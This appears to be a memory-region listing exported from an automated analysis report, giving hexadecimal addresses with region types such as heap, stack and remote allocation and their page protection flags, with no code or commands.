7FF642FB0000
|
unkown
|
page readonly
|
||
27DB6E15000
|
heap
|
page read and write
|
||
3137000
|
heap
|
page read and write
|
||
18E5A755000
|
heap
|
page read and write
|
||
18E587F7000
|
heap
|
page read and write
|
||
18E5A611000
|
heap
|
page read and write
|
||
18E5A710000
|
heap
|
page read and write
|
||
18E5A764000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
18E587DA000
|
heap
|
page read and write
|
||
2D59000
|
heap
|
page read and write
|
||
27DB6FBC000
|
heap
|
page read and write
|
||
29C1E692000
|
heap
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
27DB7348000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
2AC33060000
|
heap
|
page read and write
|
||
18E5AB39000
|
heap
|
page read and write
|
||
221E5DB0000
|
heap
|
page read and write
|
||
18E5A6C7000
|
heap
|
page read and write
|
||
27DB6F99000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
56D217B000
|
stack
|
page read and write
|
||
18E5A82D000
|
heap
|
page read and write
|
||
33B9000
|
heap
|
page read and write
|
||
18E5AC3F000
|
heap
|
page read and write
|
||
29C1E2DE000
|
heap
|
page read and write
|
||
303D000
|
stack
|
page read and write
|
||
18E5AB39000
|
heap
|
page read and write
|
||
2852F918000
|
heap
|
page read and write
|
||
18E5A66A000
|
heap
|
page read and write
|
||
1EEDC278000
|
heap
|
page read and write
|
||
1F505C4B000
|
heap
|
page read and write
|
||
BC0000
|
remote allocation
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
27DB6FC6000
|
heap
|
page read and write
|
||
315F000
|
heap
|
page read and write
|
||
1B09F42E000
|
heap
|
page read and write
|
||
231CE1A0000
|
heap
|
page read and write
|
||
29C1E6CA000
|
heap
|
page read and write
|
||
18E5ABDA000
|
heap
|
page read and write
|
||
29370FE000
|
stack
|
page read and write
|
||
1840CB62000
|
heap
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
27DB704C000
|
heap
|
page read and write
|
||
1EEDCB6D000
|
heap
|
page read and write
|
||
A91FDF4000
|
stack
|
page read and write
|
||
29C1E3C9000
|
heap
|
page read and write
|
||
18E5A822000
|
heap
|
page read and write
|
||
2852F7D0000
|
trusted library allocation
|
page read and write
|
||
27DB7027000
|
heap
|
page read and write
|
||
29C1E362000
|
heap
|
page read and write
|
||
17782120000
|
heap
|
page read and write
|
||
18E5AD29000
|
heap
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
18E5AAF0000
|
heap
|
page read and write
|
||
18E5AC3C000
|
heap
|
page read and write
|
||
27DB6F9B000
|
heap
|
page read and write
|
||
7FF797397000
|
unkown
|
page readonly
|
||
27DB6E83000
|
heap
|
page read and write
|
||
7FF642FB1000
|
unkown
|
page execute read
|
||
29C1E66A000
|
heap
|
page read and write
|
||
7FF7974ED000
|
unkown
|
page readonly
|
||
27DB733C000
|
heap
|
page read and write
|
||
7FF6434E4000
|
unkown
|
page write copy
|
||
7FF64349A000
|
unkown
|
page readonly
|
||
7FF797397000
|
unkown
|
page readonly
|
||
2E01000
|
heap
|
page read and write
|
||
29C1E28F000
|
heap
|
page read and write
|
||
18E5AD25000
|
heap
|
page read and write
|
||
29C1E72B000
|
heap
|
page read and write
|
||
29C1E2AC000
|
heap
|
page read and write
|
||
27DB7277000
|
heap
|
page read and write
|
||
374C27B000
|
stack
|
page read and write
|
||
1C82BB02000
|
heap
|
page read and write
|
||
18E5A64C000
|
heap
|
page read and write
|
||
221E5A93000
|
heap
|
page read and write
|
||
18E5ABCD000
|
heap
|
page read and write
|
||
A91F4FE000
|
stack
|
page read and write
|
||
27DB702D000
|
heap
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
31FE000
|
stack
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
18E5A77D000
|
heap
|
page read and write
|
||
17782170000
|
heap
|
page read and write
|
||
18E5A82F000
|
heap
|
page read and write
|
||
18E58740000
|
remote allocation
|
page read and write
|
||
18E5AB3A000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
18E5AC3C000
|
heap
|
page read and write
|
||
29032113000
|
heap
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
27858429000
|
heap
|
page read and write
|
||
33C7000
|
heap
|
page read and write
|
||
A91F8FE000
|
stack
|
page read and write
|
||
18E587AF000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
29C1E7F9000
|
heap
|
page read and write
|
||
27DB703F000
|
heap
|
page read and write
|
||
29C1C370000
|
remote allocation
|
page read and write
|
||
A91EB8A000
|
stack
|
page read and write
|
||
27DB6E90000
|
heap
|
page read and write
|
||
18E5A611000
|
heap
|
page read and write
|
||
573E0FD000
|
stack
|
page read and write
|
||
231CEF00000
|
trusted library allocation
|
page read and write
|
||
1C82BA25000
|
heap
|
page read and write
|
||
29C1E3A3000
|
heap
|
page read and write
|
||
32C0000
|
remote allocation
|
page read and write
|
||
1F505C48000
|
heap
|
page read and write
|
||
18E5A76E000
|
heap
|
page read and write
|
||
2AC33085000
|
heap
|
page read and write
|
||
27DB6E7B000
|
heap
|
page read and write
|
||
29C1E69D000
|
heap
|
page read and write
|
||
7FF6FC45A000
|
unkown
|
page readonly
|
||
21271D69000
|
heap
|
page read and write
|
||
7FF7974E4000
|
unkown
|
page write copy
|
||
29C1E912000
|
heap
|
page read and write
|
||
1EEDC292000
|
heap
|
page read and write
|
||
374C77E000
|
stack
|
page read and write
|
||
237F5822000
|
heap
|
page read and write
|
||
29C1E244000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
29C1E6E0000
|
heap
|
page read and write
|
||
1C82B7D0000
|
heap
|
page read and write
|
||
1EEDC38E000
|
heap
|
page read and write
|
||
27DB6FA3000
|
heap
|
page read and write
|
||
18E5A75F000
|
heap
|
page read and write
|
||
18E5A6DD000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
18E5A824000
|
heap
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
18E5A711000
|
heap
|
page read and write
|
||
2AC3307B000
|
heap
|
page read and write
|
||
1EEDCB14000
|
heap
|
page read and write
|
||
9B7000
|
heap
|
page read and write
|
||
2D5E000
|
stack
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
2AC33045000
|
heap
|
page read and write
|
||
29C1E667000
|
heap
|
page read and write
|
||
45926FD000
|
stack
|
page read and write
|
||
7FF7974ED000
|
unkown
|
page readonly
|
||
F6F37FE000
|
stack
|
page read and write
|
||
18E5AAF0000
|
heap
|
page read and write
|
||
18E5A629000
|
heap
|
page read and write
|
||
1E1230F9000
|
heap
|
page read and write
|
||
459247E000
|
stack
|
page read and write
|
||
1840CBA0000
|
heap
|
page read and write
|
||
18E5AA9B000
|
heap
|
page read and write
|
||
18E5AA89000
|
heap
|
page read and write
|
||
1E808BB5000
|
heap
|
page read and write
|
||
51A0000
|
trusted library allocation
|
page read and write
|
||
29C1E81D000
|
heap
|
page read and write
|
||
29C1E277000
|
heap
|
page read and write
|
||
1F505C06000
|
heap
|
page read and write
|
||
7FF643397000
|
unkown
|
page readonly
|
||
27DB6F95000
|
heap
|
page read and write
|
||
F9A70FB000
|
stack
|
page read and write
|
||
18E5A75D000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
1C82BA13000
|
heap
|
page read and write
|
||
29C1EAC9000
|
heap
|
page read and write
|
||
806DBFE000
|
stack
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
29C1C524000
|
heap
|
page read and write
|
||
18E5ABA4000
|
heap
|
page read and write
|
||
1F505BD0000
|
heap
|
page read and write
|
||
29C1E6B3000
|
heap
|
page read and write
|
||
A91EEFE000
|
stack
|
page read and write
|
||
18E5ABCD000
|
heap
|
page read and write
|
||
1E808B70000
|
heap
|
page read and write
|
||
1F505C74000
|
heap
|
page read and write
|
||
18E5A6F4000
|
heap
|
page read and write
|
||
29C1E2C6000
|
heap
|
page read and write
|
||
27DB6E31000
|
heap
|
page read and write
|
||
7FF6FC4AD000
|
unkown
|
page readonly
|
||
2D50000
|
heap
|
page read and write
|
||
29C1E484000
|
heap
|
page read and write
|
||
3151000
|
heap
|
page read and write
|
||
A91F2FF000
|
stack
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
3159000
|
heap
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
1EEDC26D000
|
heap
|
page read and write
|
||
1EEDCB0A000
|
heap
|
page read and write
|
||
18E5A75D000
|
heap
|
page read and write
|
||
182AE388000
|
heap
|
page read and write
|
||
29812E02000
|
trusted library allocation
|
page read and write
|
||
21271C00000
|
heap
|
page read and write
|
||
459257D000
|
stack
|
page read and write
|
||
29C1E464000
|
heap
|
page read and write
|
||
EE6A8FE000
|
stack
|
page read and write
|
||
29C1E3CC000
|
heap
|
page read and write
|
||
29C1E229000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
231CE180000
|
heap
|
page read and write
|
||
B0E000
|
stack
|
page read and write
|
||
573E5FE000
|
stack
|
page read and write
|
||
27DB4EF0000
|
remote allocation
|
page read and write
|
||
18E5AB31000
|
heap
|
page read and write
|
||
29C1E4C9000
|
heap
|
page read and write
|
||
27DB6EBB000
|
heap
|
page read and write
|
||
27DB72E3000
|
heap
|
page read and write
|
||
27DB6E54000
|
heap
|
page read and write
|
||
1B09F402000
|
heap
|
page read and write
|
||
EBBE3FC000
|
stack
|
page read and write
|
||
29C1EAB2000
|
heap
|
page read and write
|
||
221E5A82000
|
heap
|
page read and write
|
||
7CF000
|
stack
|
page read and write
|
||
27858400000
|
heap
|
page read and write
|
||
A56000
|
heap
|
page read and write
|
||
4D1FBFE000
|
unkown
|
page read and write
|
||
29374FF000
|
stack
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
1AFAEAD0000
|
heap
|
page read and write
|
||
29C1E26A000
|
heap
|
page read and write
|
||
29C1E6DD000
|
heap
|
page read and write
|
||
29C1E69A000
|
heap
|
page read and write
|
||
1F505BEA000
|
heap
|
page read and write
|
||
18E5A79D000
|
heap
|
page read and write
|
||
27DB6E79000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
96F9EFD000
|
stack
|
page read and write
|
||
1C82BA02000
|
heap
|
page read and write
|
||
7FF6FC45A000
|
unkown
|
page readonly
|
||
1F505C01000
|
heap
|
page read and write
|
||
7FF6FBF70000
|
unkown
|
page readonly
|
||
B9C000
|
stack
|
page read and write
|
||
1EEDC860000
|
trusted library allocation
|
page read and write
|
||
18E587BF000
|
heap
|
page read and write
|
||
29C1E6E8000
|
heap
|
page read and write
|
||
29C1E2E3000
|
heap
|
page read and write
|
||
52A8000
|
trusted library allocation
|
page read and write
|
||
29C1E6F8000
|
heap
|
page read and write
|
||
18E5A644000
|
heap
|
page read and write
|
||
B6C000
|
stack
|
page read and write
|
||
18E5A66F000
|
heap
|
page read and write
|
||
27DB7434000
|
heap
|
page read and write
|
||
27DB4EA0000
|
heap
|
page read and write
|
||
F9A777E000
|
stack
|
page read and write
|
||
18E5A824000
|
heap
|
page read and write
|
||
1E808A80000
|
unkown
|
page readonly
|
||
3167000
|
heap
|
page read and write
|
||
18E587D5000
|
heap
|
page read and write
|
||
459207B000
|
stack
|
page read and write
|
||
18E5A763000
|
heap
|
page read and write
|
||
18E587FC000
|
heap
|
page read and write
|
||
29C1E68B000
|
heap
|
page read and write
|
||
18E5A759000
|
heap
|
page read and write
|
||
CCF677E000
|
stack
|
page read and write
|
||
7FF7974ED000
|
unkown
|
page readonly
|
||
18E5A77C000
|
heap
|
page read and write
|
||
1EEDC1D0000
|
trusted library allocation
|
page read and write
|
||
27DB6EEA000
|
heap
|
page read and write
|
||
5AAB07E000
|
stack
|
page read and write
|
||
314F000
|
stack
|
page read and write
|
||
29C1E69D000
|
heap
|
page read and write
|
||
27DB6F11000
|
heap
|
page read and write
|
||
182AE3A9000
|
heap
|
page read and write
|
||
527DFFE000
|
stack
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
7FFC23C74000
|
unkown
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
18E5AB3F000
|
heap
|
page read and write
|
||
29C1E6D5000
|
heap
|
page read and write
|
||
7FF643397000
|
unkown
|
page readonly
|
||
1EEDCC02000
|
heap
|
page read and write
|
||
27DB6F93000
|
heap
|
page read and write
|
||
2E01000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
EE69CF3000
|
stack
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
29C1E676000
|
heap
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
182AE397000
|
heap
|
page read and write
|
||
EBBDC7C000
|
stack
|
page read and write
|
||
29C1C54C000
|
heap
|
page read and write
|
||
27DB7399000
|
heap
|
page read and write
|
||
27DB703C000
|
heap
|
page read and write
|
||
1AFAEC57000
|
heap
|
page read and write
|
||
390000
|
remote allocation
|
page read and write
|
||
2852F902000
|
heap
|
page read and write
|
||
18E5AC3C000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
18E5AD0B000
|
heap
|
page read and write
|
||
29C1E200000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
29C1E985000
|
heap
|
page read and write
|
||
374C57B000
|
stack
|
page read and write
|
||
29C1E8FC000
|
heap
|
page read and write
|
||
3080000
|
trusted library allocation
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
18E5A692000
|
heap
|
page read and write
|
||
27DB7525000
|
heap
|
page read and write
|
||
49C1000
|
trusted library allocation
|
page read and write
|
||
1C82BA79000
|
heap
|
page read and write
|
||
29C1E3D1000
|
heap
|
page read and write
|
||
315F000
|
heap
|
page read and write
|
||
18E5A768000
|
heap
|
page read and write
|
||
30B0000
|
trusted library allocation
|
page read and write
|
||
2AC33047000
|
heap
|
page read and write
|
||
3151000
|
heap
|
page read and write
|
||
1840CBA0000
|
heap
|
page read and write
|
||
18E5ABAF000
|
heap
|
page read and write
|
||
18E5ABDA000
|
heap
|
page read and write
|
||
27DB7014000
|
heap
|
page read and write
|
||
59D42FE000
|
stack
|
page read and write
|
||
E0B44FF000
|
stack
|
page read and write
|
||
27DB733E000
|
heap
|
page read and write
|
||
1EEDC3B9000
|
heap
|
page read and write
|
||
18E5A689000
|
heap
|
page read and write
|
||
7FFC23C70000
|
unkown
|
page readonly
|
||
27DB6E7B000
|
heap
|
page read and write
|
||
2AC3302A000
|
heap
|
page read and write
|
||
A47000
|
heap
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
18E5A63B000
|
heap
|
page read and write
|
||
1F505C6D000
|
heap
|
page read and write
|
||
4D201FF000
|
stack
|
page read and write
|
||
182AE32C000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
1E122F20000
|
heap
|
page read and write
|
||
1840CB80000
|
heap
|
page read and write
|
||
806D8FF000
|
stack
|
page read and write
|
||
29C1E3C7000
|
heap
|
page read and write
|
||
27DB50D2000
|
heap
|
page read and write
|
||
216AF830000
|
heap
|
page read and write
|
||
29C1E660000
|
heap
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
27DB7112000
|
heap
|
page read and write
|
||
231CDF40000
|
trusted library allocation
|
page read and write
|
||
1B09F270000
|
heap
|
page read and write
|
||
1840CB50000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
33DF000
|
heap
|
page read and write
|
||
29C1E732000
|
heap
|
page read and write
|
||
29C1E6F5000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
29C1E230000
|
heap
|
page read and write
|
||
182AE353000
|
heap
|
page read and write
|
||
18E5AA97000
|
heap
|
page read and write
|
||
27DB6FAC000
|
heap
|
page read and write
|
||
A91FFF8000
|
stack
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
B90000
|
remote allocation
|
page read and write
|
||
BAC000
|
stack
|
page read and write
|
||
27DB7270000
|
heap
|
page read and write
|
||
221E5E15000
|
heap
|
page read and write
|
||
28531270000
|
trusted library allocation
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
18E5AC3F000
|
heap
|
page read and write
|
||
1E808BB9000
|
heap
|
page read and write
|
||
1840CA80000
|
heap
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
27DB6FA3000
|
heap
|
page read and write
|
||
806D4FE000
|
stack
|
page read and write
|
||
216AF4EB000
|
heap
|
page read and write
|
||
806E3F8000
|
stack
|
page read and write
|
||
2AC33061000
|
heap
|
page read and write
|
||
2AC3303B000
|
heap
|
page read and write
|
||
27DB6E6E000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
1840CB53000
|
heap
|
page read and write
|
||
1EEDC213000
|
heap
|
page read and write
|
||
221E5A6B000
|
heap
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
182AE410000
|
heap
|
page read and write
|
||
1840CB81000
|
heap
|
page read and write
|
||
27858360000
|
heap
|
page read and write
|
||
27DB727A000
|
heap
|
page read and write
|
||
29C1E4ED000
|
heap
|
page read and write
|
||
221E5AD4000
|
heap
|
page read and write
|
||
1F505C6A000
|
heap
|
page read and write
|
||
29373FE000
|
stack
|
page read and write
|
||
1E123120000
|
heap
|
page read and write
|
||
32D000
|
stack
|
page read and write
|
||
2AC3303E000
|
heap
|
page read and write
|
||
29C1E230000
|
heap
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
806CD43000
|
stack
|
page read and write
|
||
18E5AA78000
|
heap
|
page read and write
|
||
182AE260000
|
heap
|
page read and write
|
||
29C1E6EA000
|
heap
|
page read and write
|
||
29C1E35D000
|
heap
|
page read and write
|
||
315F000
|
heap
|
page read and write
|
||
29C1E221000
|
heap
|
page read and write
|
||
527DAFD000
|
stack
|
page read and write
|
||
1840CBA0000
|
heap
|
page read and write
|
||
27DB74F9000
|
heap
|
page read and write
|
||
1E122F60000
|
unkown
|
page readonly
|
||
29C1E45D000
|
heap
|
page read and write
|
||
2AC3307F000
|
heap
|
page read and write
|
||
7FFC23C70000
|
unkown
|
page readonly
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
18E5AA77000
|
heap
|
page read and write
|
||
29C1E816000
|
heap
|
page read and write
|
||
7FF642FB0000
|
unkown
|
page readonly
|
||
1F505E35000
|
heap
|
page read and write
|
||
29C1E2C6000
|
heap
|
page read and write
|
||
29C1E729000
|
heap
|
page read and write
|
||
29C1E6B5000
|
heap
|
page read and write
|
||
F9A737F000
|
stack
|
page read and write
|
||
182AE3A9000
|
heap
|
page read and write
|
||
21271D60000
|
heap
|
page read and write
|
||
231CE369000
|
heap
|
page read and write
|
||
29C1E332000
|
heap
|
page read and write
|
||
27DB7032000
|
heap
|
page read and write
|
||
18E5ABA0000
|
heap
|
page read and write
|
||
18E5A833000
|
heap
|
page read and write
|
||
29C1C584000
|
heap
|
page read and write
|
||
18E58920000
|
heap
|
page read and write
|
||
27DB6F94000
|
heap
|
page read and write
|
||
29C1E3D1000
|
heap
|
page read and write
|
||
2E0B000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
1F505B50000
|
unkown
|
page readonly
|
||
29C1E39D000
|
heap
|
page read and write
|
||
212719A0000
|
heap
|
page read and write
|
||
29C1E817000
|
heap
|
page read and write
|
||
27DB6E82000
|
heap
|
page read and write
|
||
9C6000
|
heap
|
page read and write
|
||
1F505C6B000
|
heap
|
page read and write
|
||
18E5A6DD000
|
heap
|
page read and write
|
||
29C1C524000
|
heap
|
page read and write
|
||
2719C270000
|
heap
|
page read and write
|
||
182AE550000
|
heap
|
page read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
7DE000
|
stack
|
page read and write
|
||
18E5A6FA000
|
heap
|
page read and write
|
||
1F505C6D000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
7FF6FC45A000
|
unkown
|
page readonly
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
F9A6C9C000
|
stack
|
page read and write
|
||
7FFC23C77000
|
unkown
|
page readonly
|
||
7FF642FB1000
|
unkown
|
page execute read
|
||
B8C000
|
stack
|
page read and write
|
||
27DB737C000
|
heap
|
page read and write
|
||
29C1E965000
|
heap
|
page read and write
|
||
1840C920000
|
heap
|
page read and write
|
||
A6978FD000
|
stack
|
page read and write
|
||
237F56A0000
|
heap
|
page read and write
|
||
27DB72EB000
|
heap
|
page read and write
|
||
27DB6E21000
|
heap
|
page read and write
|
||
29C1E2E4000
|
heap
|
page read and write
|
||
1E808A90000
|
unkown
|
page read and write
|
||
27DB729F000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
18E5A63B000
|
heap
|
page read and write
|
||
18E5AB5C000
|
heap
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
27DB7031000
|
heap
|
page read and write
|
||
27DB6F90000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
3679000
|
heap
|
page read and write
|
||
29C1C56A000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
7FF6FC4A4000
|
unkown
|
page write copy
|
||
27DB6F10000
|
heap
|
page read and write
|
||
18E5AB33000
|
heap
|
page read and write
|
||
29C1E692000
|
heap
|
page read and write
|
||
27DB733D000
|
heap
|
page read and write
|
||
2785843E000
|
heap
|
page read and write
|
||
74F000
|
stack
|
page read and write
|
||
29C1E251000
|
heap
|
page read and write
|
||
182AE3A9000
|
heap
|
page read and write
|
||
F9A767C000
|
stack
|
page read and write
|
||
1F505BA0000
|
heap
|
page read and write
|
||
17782142000
|
heap
|
page read and write
|
||
27DB733F000
|
heap
|
page read and write
|
||
1AFAEC13000
|
heap
|
page read and write
|
||
17782170000
|
heap
|
page read and write
|
||
7FF79749A000
|
unkown
|
page readonly
|
||
182AE346000
|
heap
|
page read and write
|
||
315F000
|
heap
|
page read and write
|
||
1E808BB9000
|
heap
|
page read and write
|
||
1840CB5B000
|
heap
|
page read and write
|
||
7FF6FC4A4000
|
unkown
|
page write copy
|
||
27DB6FA3000
|
heap
|
page read and write
|
||
25708930000
|
heap
|
page read and write
|
||
27DB50B8000
|
heap
|
page read and write
|
||
29C1E6F8000
|
heap
|
page read and write
|
||
27DB7549000
|
heap
|
page read and write
|
||
27DB729B000
|
heap
|
page read and write
|
||
7FFC23577000
|
unkown
|
page readonly
|
||
3151000
|
heap
|
page read and write
|
||
18E5A6BC000
|
heap
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
1C82BA51000
|
heap
|
page read and write
|
||
221E5E10000
|
heap
|
page read and write
|
||
29C1E28F000
|
heap
|
page read and write
|
||
221E5A68000
|
heap
|
page read and write
|
||
29C1E708000
|
heap
|
page read and write
|
||
27DB702D000
|
heap
|
page read and write
|
||
29C1E26F000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
BD0000
|
remote allocation
|
page read and write
|
||
27DB6F9A000
|
heap
|
page read and write
|
||
2E0A000
|
heap
|
page read and write
|
||
316F000
|
heap
|
page read and write
|
||
27DB508D000
|
heap
|
page read and write
|
||
216AF4E0000
|
heap
|
page read and write
|
||
29C1E324000
|
heap
|
page read and write
|
||
29C1E6FC000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
7FFC23574000
|
unkown
|
page read and write
|
||
27DB7036000
|
heap
|
page read and write
|
||
29C1E335000
|
heap
|
page read and write
|
||
B40E6FF000
|
unkown
|
page read and write
|
||
34A7000
|
heap
|
page read and write
|
||
29C1E207000
|
heap
|
page read and write
|
||
1B09F454000
|
heap
|
page read and write
|
||
27DB6FBF000
|
heap
|
page read and write
|
||
459277E000
|
stack
|
page read and write
|
||
1EEDC0D0000
|
heap
|
page read and write
|
||
2719C2E0000
|
heap
|
page read and write
|
||
7FF6434EB000
|
unkown
|
page read and write
|
||
1E808A70000
|
unkown
|
page readonly
|
||
27DB704C000
|
heap
|
page read and write
|
||
1F505C6C000
|
heap
|
page read and write
|
||
7FFC23C74000
|
unkown
|
page read and write
|
||
29C1E9CD000
|
heap
|
page read and write
|
||
18E5AAC8000
|
heap
|
page read and write
|
||
29812713000
|
heap
|
page read and write
|
||
27DB72BB000
|
heap
|
page read and write
|
||
18E5A737000
|
heap
|
page read and write
|
||
27DB69C5000
|
heap
|
page read and write
|
||
7FF6434ED000
|
unkown
|
page readonly
|
||
18E5AB46000
|
heap
|
page read and write
|
||
18E5A644000
|
heap
|
page read and write
|
||
18E5A611000
|
heap
|
page read and write
|
||
18E5AA9B000
|
heap
|
page read and write
|
||
18E5878C000
|
heap
|
page read and write
|
||
527DBFE000
|
stack
|
page read and write
|
||
32C0000
|
remote allocation
|
page read and write
|
||
29C1E45D000
|
heap
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
27DB7513000
|
heap
|
page read and write
|
||
18E587B2000
|
heap
|
page read and write
|
||
27DB732E000
|
heap
|
page read and write
|
||
1F505B10000
|
heap
|
page read and write
|
||
3151000
|
heap
|
page read and write
|
||
27DB6EEA000
|
heap
|
page read and write
|
||
1AFAEC60000
|
heap
|
page read and write
|
||
18E5A826000
|
heap
|
page read and write
|
||
29C1E816000
|
heap
|
page read and write
|
||
3167000
|
heap
|
page read and write
|
||
29C1E224000
|
heap
|
page read and write
|
||
18E5ABC5000
|
heap
|
page read and write
|
||
2981265A000
|
heap
|
page read and write
|
||
29C1E7F9000
|
heap
|
page read and write
|
||
52C000
|
stack
|
page read and write
|
||
29C1E3D1000
|
heap
|
page read and write
|
||
17782161000
|
heap
|
page read and write
|
||
182AE38E000
|
heap
|
page read and write
|
||
27DB7024000
|
heap
|
page read and write
|
||
1840CBA0000
|
heap
|
page read and write
|
||
29C1E24F000
|
heap
|
page read and write
|
||
A69747A000
|
stack
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
29C1E68F000
|
heap
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
29C1E6BE000
|
heap
|
page read and write
|
||
A5E000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
18E5A825000
|
heap
|
page read and write
|
||
278584E3000
|
heap
|
page read and write
|
||
29C1E334000
|
heap
|
page read and write
|
||
231CEEA0000
|
trusted library allocation
|
page read and write
|
||
29C1E499000
|
heap
|
page read and write
|
||
221E5AD4000
|
heap
|
page read and write
|
||
EE69CFA000
|
stack
|
page read and write
|
||
9AF000
|
stack
|
page read and write
|
||
2936EFB000
|
stack
|
page read and write
|
||
29C1E72B000
|
heap
|
page read and write
|
||
79E000
|
stack
|
page read and write
|
||
7FF7974E4000
|
unkown
|
page write copy
|
||
29C1E241000
|
heap
|
page read and write
|
||
216AF3D0000
|
heap
|
page read and write
|
||
1778213F000
|
heap
|
page read and write
|
||
29C1C370000
|
remote allocation
|
page read and write
|
||
18E5A63E000
|
heap
|
page read and write
|
||
29C1E260000
|
heap
|
page read and write
|
||
29C1E45F000
|
heap
|
page read and write
|
||
A6976FC000
|
stack
|
page read and write
|
||
29C1E464000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
18E5AC7A000
|
heap
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
17782132000
|
heap
|
page read and write
|
||
4D1FCFE000
|
stack
|
page read and write
|
||
29C1E35E000
|
heap
|
page read and write
|
||
27DB733D000
|
heap
|
page read and write
|
||
29C1E692000
|
heap
|
page read and write
|
||
7FF6FBF71000
|
unkown
|
page execute read
|
||
45925FE000
|
stack
|
page read and write
|
||
29C1E3A2000
|
heap
|
page read and write
|
||
806D0FD000
|
stack
|
page read and write
|
||
27DB7348000
|
heap
|
page read and write
|
||
550000
|
remote allocation
|
page read and write
|
||
18E5A82A000
|
heap
|
page read and write
|
||
18E5A2C5000
|
heap
|
page read and write
|
||
1AFAEB90000
|
remote allocation
|
page read and write
|
||
1778216A000
|
heap
|
page read and write
|
||
18E5880C000
|
heap
|
page read and write
|
||
27DB50D9000
|
heap
|
page read and write
|
||
29C1E68B000
|
heap
|
page read and write
|
||
1EEDCB54000
|
heap
|
page read and write
|
||
27DB751C000
|
heap
|
page read and write
|
||
2E17000
|
heap
|
page read and write
|
||
29C1E2DF000
|
heap
|
page read and write
|
||
27DB6E46000
|
heap
|
page read and write
|
||
806E5F6000
|
stack
|
page read and write
|
||
1EEDCBBC000
|
heap
|
page read and write
|
||
27DB7052000
|
heap
|
page read and write
|
||
298125C0000
|
trusted library allocation
|
page read and write
|
||
33B5000
|
heap
|
page read and write
|
||
7FFC23570000
|
unkown
|
page readonly
|
||
1840CB5F000
|
heap
|
page read and write
|
||
29C1E6D3000
|
heap
|
page read and write
|
||
FA257BE000
|
stack
|
page read and write
|
||
18E5AB3A000
|
heap
|
page read and write
|
||
237F5803000
|
heap
|
page read and write
|
||
27DB7052000
|
heap
|
page read and write
|
||
237F56C0000
|
heap
|
page read and write
|
||
18E587B8000
|
heap
|
page read and write
|
||
29C1E360000
|
heap
|
page read and write
|
||
27DB50C9000
|
heap
|
page read and write
|
||
18E587F0000
|
heap
|
page read and write
|
||
2AC33058000
|
heap
|
page read and write
|
||
29C1E71C000
|
heap
|
page read and write
|
||
27DB7047000
|
heap
|
page read and write
|
